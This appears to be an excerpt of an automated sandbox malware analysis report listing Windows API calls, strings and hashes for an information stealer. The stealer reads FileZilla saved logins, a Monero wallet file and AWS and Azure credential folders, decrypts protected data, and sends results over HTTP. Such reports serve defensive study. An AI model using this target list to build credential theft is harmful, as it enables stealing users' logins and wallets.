                            • API String ID: 0-1096613218
                            • Opcode ID: c8c679c519bf355c1377f4b3b711c30a18ef8b23d6dd4551e64fd195acc58130
                            • Instruction ID: 83b6b04f2ebb1c644d5c12a375842d80ea3d6610b33bf23947d0813903abf41e
                            • Opcode Fuzzy Hash: c8c679c519bf355c1377f4b3b711c30a18ef8b23d6dd4551e64fd195acc58130
                            • Instruction Fuzzy Hash: E3B214F360C204AFE304AE29EC8567AFBE5EF94720F1A493DE6C4C3744EA3558458697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %!$Z}~j${"}{
                            • API String ID: 0-624438500
                            • Opcode ID: 3258fb987fda42cb3973c36b5059a51a1ac5e1322f689a31270b964f70d430c8
                            • Instruction ID: f28d928f3e57bc70076b129d2d3256699270270ee5030bd5661aa77395c81a8e
                            • Opcode Fuzzy Hash: 3258fb987fda42cb3973c36b5059a51a1ac5e1322f689a31270b964f70d430c8
                            • Instruction Fuzzy Hash: 56A2E4F360C6009FE304AE29EC85B7ABBE5EF98320F1A493DE6C5C3744E67558058697
                            APIs
                            • CoCreateInstance.COMBASE(0068E118,00000000,00000001,0068E108,00000000), ref: 00683758
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006837B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: 504344531d1070b4d6ab0c188d5a8a94aefebd451c56bec5fb806eb740b1ce53
                            • Instruction ID: 22fc7847402fe7e44ca13475cf1a970d3b19330d95b9c32abffd4fd332cb0b48
                            • Opcode Fuzzy Hash: 504344531d1070b4d6ab0c188d5a8a94aefebd451c56bec5fb806eb740b1ce53
                            • Instruction Fuzzy Hash: DF41D970A40A289FDB24DF58CC95B9BB7B5BB48702F4052D8E609E72D0D7716E85CF50
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00679B84
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00679BA3
                            • LocalFree.KERNEL32(?), ref: 00679BD3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: 032966990c84a4614602ed3e3b8609afb2be9e565ab322d6eccb54d160d02aa9
                            • Instruction ID: 25ca91693239253771b7e59cd2bb4a643c5580df30605f0704a683315cab2ff1
                            • Opcode Fuzzy Hash: 032966990c84a4614602ed3e3b8609afb2be9e565ab322d6eccb54d160d02aa9
                            • Instruction Fuzzy Hash: 4111C9B8A00209EFDB04DF94D999AAE77F5FF89700F104698E915A7350D770AE10CFA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: qkm
                            • API String ID: 0-3173522632
                            • Opcode ID: 82c5d3a96085e210c49b7c4cd02fba5aa81880344919bbb391910f309c2750fa
                            • Instruction ID: 3943a91f3fd9a7907bc97f70bc25ddea3bf4161b51778d78fcc2b9e5c4207f9e
                            • Opcode Fuzzy Hash: 82c5d3a96085e210c49b7c4cd02fba5aa81880344919bbb391910f309c2750fa
                            • Instruction Fuzzy Hash: 1672E2F360C2149FE304AF29EC8567ABBE5EF94720F16492DEAC4C7744E63598408B97
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Similarity
                            • String ID: ~hO
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 00688DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00688E0B
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 006799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006799EC
                              • Part of subcall function 006799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00679A11
                              • Part of subcall function 006799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00679A31
                              • Part of subcall function 006799C0: ReadFile.KERNEL32(000000FF,?,00000000,0067148F,00000000), ref: 00679A5A
                              • Part of subcall function 006799C0: LocalFree.KERNEL32(0067148F), ref: 00679A90
                              • Part of subcall function 006799C0: CloseHandle.KERNEL32(000000FF), ref: 00679A9A
                              • Part of subcall function 00688E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00688E52
                            • GetProcessHeap.KERNEL32(00000000,000F423F,00690DBA,00690DB7,00690DB6,00690DB3), ref: 00680362
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00680369
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00680385
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00690DB2), ref: 00680393
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 006803CF
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00690DB2), ref: 006803DD
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00680419
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00690DB2), ref: 00680427
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00680463
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00690DB2), ref: 00680475
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00690DB2), ref: 00680502
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00690DB2), ref: 0068051A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00690DB2), ref: 00680532
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00690DB2), ref: 0068054A
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00680562
                            • lstrcat.KERNEL32(?,profile: null), ref: 00680571
                            • lstrcat.KERNEL32(?,url: ), ref: 00680580
                            • lstrcat.KERNEL32(?,00000000), ref: 00680593
                            • lstrcat.KERNEL32(?,00691678), ref: 006805A2
                            • lstrcat.KERNEL32(?,00000000), ref: 006805B5
                            • lstrcat.KERNEL32(?,0069167C), ref: 006805C4
                            • lstrcat.KERNEL32(?,login: ), ref: 006805D3
                            • lstrcat.KERNEL32(?,00000000), ref: 006805E6
                            • lstrcat.KERNEL32(?,00691688), ref: 006805F5
                            • lstrcat.KERNEL32(?,password: ), ref: 00680604
                            • lstrcat.KERNEL32(?,00000000), ref: 00680617
                            • lstrcat.KERNEL32(?,00691698), ref: 00680626
                            • lstrcat.KERNEL32(?,0069169C), ref: 00680635
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00690DB2), ref: 0068068E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            APIs
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 006747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00674839
                              • Part of subcall function 006747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00674849
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006759F8
                            • StrCmpCA.SHLWAPI(?,012BF3F0), ref: 00675A13
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00675B93
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,012BF400,00000000,?,012BE4F8,00000000,?,00691A1C), ref: 00675E71
                            • lstrlen.KERNEL32(00000000), ref: 00675E82
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00675E93
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00675E9A
                            • lstrlen.KERNEL32(00000000), ref: 00675EAF
                            • lstrlen.KERNEL32(00000000), ref: 00675ED8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00675EF1
                            • lstrlen.KERNEL32(00000000,?,?), ref: 00675F1B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00675F2F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00675F4C
                            • InternetCloseHandle.WININET(00000000), ref: 00675FB0
                            • InternetCloseHandle.WININET(00000000), ref: 00675FBD
                            • HttpOpenRequestA.WININET(00000000,012BF4A0,?,012BEBF8,00000000,00000000,00400100,00000000), ref: 00675BF8
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                            • InternetCloseHandle.WININET(00000000), ref: 00675FC7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: 82f812e2569d63f1af82c085341ccc5aeab1fe4f6519d42430dfef376f01cc3f
                            • Instruction ID: 4bfdcf2dbf4d8034b575204ec463eb1f2a2b08e8798cdadb3cb5dc44bfd70310
                            • Opcode Fuzzy Hash: 82f812e2569d63f1af82c085341ccc5aeab1fe4f6519d42430dfef376f01cc3f
                            • Instruction Fuzzy Hash: FB12F171820118AAEB55FBA0DC95FEE737ABF14700F50429EF50672091EF742A4ACF69
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 00688B60: GetSystemTime.KERNEL32(00690E1A,012BE078,006905AE,?,?,006713F9,?,0000001A,00690E1A,00000000,?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 00688B86
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0067CF83
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0067D0C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0067D0CE
                            • lstrcat.KERNEL32(?,00000000), ref: 0067D208
                            • lstrcat.KERNEL32(?,00691478), ref: 0067D217
                            • lstrcat.KERNEL32(?,00000000), ref: 0067D22A
                            • lstrcat.KERNEL32(?,0069147C), ref: 0067D239
                            • lstrcat.KERNEL32(?,00000000), ref: 0067D24C
                            • lstrcat.KERNEL32(?,00691480), ref: 0067D25B
                            • lstrcat.KERNEL32(?,00000000), ref: 0067D26E
                            • lstrcat.KERNEL32(?,00691484), ref: 0067D27D
                            • lstrcat.KERNEL32(?,00000000), ref: 0067D290
                            • lstrcat.KERNEL32(?,00691488), ref: 0067D29F
                            • lstrcat.KERNEL32(?,00000000), ref: 0067D2B2
                            • lstrcat.KERNEL32(?,0069148C), ref: 0067D2C1
                            • lstrcat.KERNEL32(?,00000000), ref: 0067D2D4
                            • lstrcat.KERNEL32(?,00691490), ref: 0067D2E3
                              • Part of subcall function 0068A820: lstrlen.KERNEL32(00674F05,?,?,00674F05,00690DDE), ref: 0068A82B
                              • Part of subcall function 0068A820: lstrcpy.KERNEL32(00690DDE,00000000), ref: 0068A885
                            • lstrlen.KERNEL32(?), ref: 0067D32A
                            • lstrlen.KERNEL32(?), ref: 0067D339
                              • Part of subcall function 0068AA70: StrCmpCA.SHLWAPI(012B8988,0067A7A7,?,0067A7A7,012B8988), ref: 0068AA8F
                            • DeleteFileA.KERNEL32(00000000), ref: 0067D3B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: 3e379ab27120c6eb9a64badfbaaeb04aba12e94ee8e74e556f84ffe24dcf9966
                            • Instruction ID: 464086d359185a7da2e6d50cd504b9c90076a20ceeff670bea9eccfdb8f6e9e4
                            • Opcode Fuzzy Hash: 3e379ab27120c6eb9a64badfbaaeb04aba12e94ee8e74e556f84ffe24dcf9966
                            • Instruction Fuzzy Hash: CDE120B1910108ABDB48FBE0DD96EEE737ABF14300F104259F907B6491DE39AA05CB76
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,012BD788,00000000,?,0069144C,00000000,?,?), ref: 0067CA6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0067CA89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0067CA95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0067CAA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0067CAD9
                            • StrStrA.SHLWAPI(?,012BD7A0,00690B52), ref: 0067CAF7
                            • StrStrA.SHLWAPI(00000000,012BD7B8), ref: 0067CB1E
                            • StrStrA.SHLWAPI(?,012BDFC0,00000000,?,00691458,00000000,?,00000000,00000000,?,012B8958,00000000,?,00691454,00000000,?), ref: 0067CCA2
                            • StrStrA.SHLWAPI(00000000,012BDDE0), ref: 0067CCB9
                              • Part of subcall function 0067C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0067C871
                              • Part of subcall function 0067C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0067C87C
                            • StrStrA.SHLWAPI(?,012BDDE0,00000000,?,0069145C,00000000,?,00000000,012B8968), ref: 0067CD5A
                            • StrStrA.SHLWAPI(00000000,012B8C38), ref: 0067CD71
                              • Part of subcall function 0067C820: lstrcat.KERNEL32(?,00690B46), ref: 0067C943
                              • Part of subcall function 0067C820: lstrcat.KERNEL32(?,00690B47), ref: 0067C957
                              • Part of subcall function 0067C820: lstrcat.KERNEL32(?,00690B4E), ref: 0067C978
                            • lstrlen.KERNEL32(00000000), ref: 0067CE44
                            • CloseHandle.KERNEL32(00000000), ref: 0067CE9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: b1789ae76288fed21f816f23e6a664bcd0bcbb5072ecb873401c6e1e049754c4
                            • Instruction ID: f5b315ff63e24ade7fb46163785c938f7d067072fb68248fc57ed1456d491e2f
                            • Opcode Fuzzy Hash: b1789ae76288fed21f816f23e6a664bcd0bcbb5072ecb873401c6e1e049754c4
                            • Instruction Fuzzy Hash: 87E10FB1810108ABEB58FBE4DC91FEE777AAF14300F40425EF50676191DF346A4ACB6A
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            • RegOpenKeyExA.ADVAPI32(00000000,012BB848,00000000,00020019,00000000,006905B6), ref: 006883A4
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00688426
                            • wsprintfA.USER32 ref: 00688459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0068847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0068848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00688499
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 3246050789-3278919252
                            • Opcode ID: a269118a21422ac24b33dcd479bc85fe7c4bd09d8a266201facb03a183a1fbb8
                            • Instruction ID: d228dcf69af5ecdcd9acba00cf46b7192d2e596da526da5cb21c3214347dca99
                            • Opcode Fuzzy Hash: a269118a21422ac24b33dcd479bc85fe7c4bd09d8a266201facb03a183a1fbb8
                            • Instruction Fuzzy Hash: 85811EB1911118AFEB68EB50CC91FEA77B9BF08700F4083D9E509A6180DF756B85CFA5
                            APIs
                              • Part of subcall function 00688DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00688E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00684DB0
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00684DCD
                              • Part of subcall function 00684910: wsprintfA.USER32 ref: 0068492C
                              • Part of subcall function 00684910: FindFirstFileA.KERNEL32(?,?), ref: 00684943
                            • lstrcat.KERNEL32(?,00000000), ref: 00684E3C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00684E59
                              • Part of subcall function 00684910: StrCmpCA.SHLWAPI(?,00690FDC), ref: 00684971
                              • Part of subcall function 00684910: StrCmpCA.SHLWAPI(?,00690FE0), ref: 00684987
                              • Part of subcall function 00684910: FindNextFileA.KERNEL32(000000FF,?), ref: 00684B7D
                              • Part of subcall function 00684910: FindClose.KERNEL32(000000FF), ref: 00684B92
                            • lstrcat.KERNEL32(?,00000000), ref: 00684EC8
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00684EE5
                              • Part of subcall function 00684910: wsprintfA.USER32 ref: 006849B0
                              • Part of subcall function 00684910: StrCmpCA.SHLWAPI(?,006908D2), ref: 006849C5
